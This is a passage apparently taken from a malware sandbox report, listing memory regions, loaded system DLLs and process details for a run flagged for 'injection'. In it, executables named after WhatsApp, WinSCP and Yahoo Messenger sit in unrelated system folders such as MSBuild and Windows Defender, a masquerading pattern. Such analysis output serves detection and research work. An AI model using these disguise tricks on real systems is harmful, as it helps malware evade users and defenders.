start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2775 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 2776 start_va = 0xb40000 end_va = 0xb56fff monitored = 0 entry_point = 0xb414a1 region_type = mapped_file name = "whatsapp.exe" filename = "\\Program Files\\MSBuild\\whatsapp.exe" (normalized: "c:\\program files\\msbuild\\whatsapp.exe") Region: id = 2777 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 2778 start_va = 0x2120000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 2779 start_va = 0x2130000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 2780 start_va = 0x2140000 end_va = 0x2b03fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 2781 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2782 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2783 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2784 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2785 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2786 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2787 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2788 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2789 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2790 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2791 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2792 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2793 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2794 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2795 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2796 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2797 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2798 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2799 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2800 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2801 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2802 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2803 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2804 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2805 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2806 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2808 start_va = 0x6f0000 end_va = 0x7b5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Thread: id = 134 os_tid = 0x1074 Thread: id = 135 os_tid = 0x1058 Process: id = "34" image_name = "winscp.exe" filename = "c:\\program files\\windowspowershell\\winscp.exe" page_root = "0x38db4000" os_pid = "0x1064" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\WindowsPowerShell\\winscp.exe\" " cur_dir = "C:\\Program Files\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2810 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2811 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2812 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2813 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2814 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2815 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2816 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2817 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2818 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2819 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2820 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2821 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2822 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2823 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2824 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2825 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2826 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2827 start_va = 0xaf0000 end_va = 0xbabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 2828 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 2829 start_va = 0xe00000 end_va = 0xe16fff monitored = 0 entry_point = 0xe014a1 region_type = mapped_file name = "winscp.exe" filename = "\\Program Files\\WindowsPowerShell\\winscp.exe" (normalized: "c:\\program files\\windowspowershell\\winscp.exe") Region: id = 2830 start_va = 0xe20000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 2831 start_va = 0x2400000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2832 start_va = 0x2410000 end_va = 0x2dd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 2833 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2834 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2835 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2836 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2837 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2838 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2839 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2840 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2841 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2842 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2843 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2844 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2845 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2846 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2847 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2848 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2849 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2850 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2851 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2852 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2853 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2854 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2855 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2856 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2857 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2858 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2860 start_va = 0x6d0000 end_va = 0x7a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Thread: id = 136 os_tid = 0x1078 Thread: id = 137 os_tid = 0x1068 Process: id = "35" image_name = "yahoomessenger.exe" filename = "c:\\program files (x86)\\windows defender\\yahoomessenger.exe" page_root = "0x42ebe000" os_pid = "0x106c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Windows Defender\\yahoomessenger.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Defender\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2862 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2863 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2864 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2865 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2866 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2867 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 2868 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 2869 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2870 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2871 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2872 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2873 start_va = 0x160000 end_va = 0x176fff monitored = 0 entry_point = 0x1614a1 region_type = mapped_file name = "yahoomessenger.exe" filename = "\\Program Files (x86)\\Windows Defender\\yahoomessenger.exe" (normalized: "c:\\program files (x86)\\windows defender\\yahoomessenger.exe") Region: id = 2874 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2875 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2876 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2877 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2878 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 2879 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2880 start_va = 0x940000 end_va = 0xac7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 2881 start_va = 0xad0000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 2882 start_va = 0xc60000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 2883 start_va = 0x2060000 end_va = 0x211bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 2884 start_va = 0x2120000 end_va = 0x2ae3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 2885 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2886 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2887 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2888 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2889 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2890 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2891 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2892 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2893 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2894 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2895 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2896 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2897 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2898 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2899 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2900 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2901 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2902 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2903 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2904 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2905 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2906 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2907 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2908 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2909 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2910 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2912 start_va = 0x2af0000 end_va = 0x2c27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002af0000" filename = "" Thread: id = 138 os_tid = 0x108c Thread: id = 139 os_tid = 0x1070 Process: id 